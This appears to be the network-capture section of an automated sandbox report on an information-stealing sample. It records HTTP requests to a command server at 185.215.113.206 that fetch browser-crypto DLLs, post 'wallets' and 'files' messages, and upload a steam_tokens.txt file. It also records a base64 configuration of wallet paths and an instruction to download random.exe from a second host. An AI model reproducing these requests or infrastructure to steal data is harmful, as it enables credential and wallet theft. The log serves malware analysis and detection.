                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717283964 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.938225985 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:42 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:44.466517925 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:44.690244913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:44 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 257872
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:44.915115118 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:45.138952971 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:45 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 80880
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:46.308279037 CET202OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 947
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.207609892 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:46 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.293735981 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHDAKFCGIJKJKFHIDHII
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 267
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="message"wallets------DHDAKFCGIJKJKFHIDHII--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.517772913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:47 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Content-Length: 2408
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.554045916 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 265
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="message"files------EBFBKKJECAKEHJJJDBAF--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.780529976 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:47 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:47.794650078 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEH
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: ------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file"------GCBKECAKFBGCAKECGIEH--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:48.508017063 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:47 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:48.536138058 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 272
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="message"ybncbhylepme------KFBGDBFBKKJECBFHDGIE--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:48.765750885 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:48 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 68
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                                                      Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:51.380920887 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 272
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDAKJKEHDBGHIDHIEHDB--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:52.097470045 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:51 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.650048185.215.113.16805740C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:48.779650927 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:49.490420103 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 1957888
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:41:46 GMT
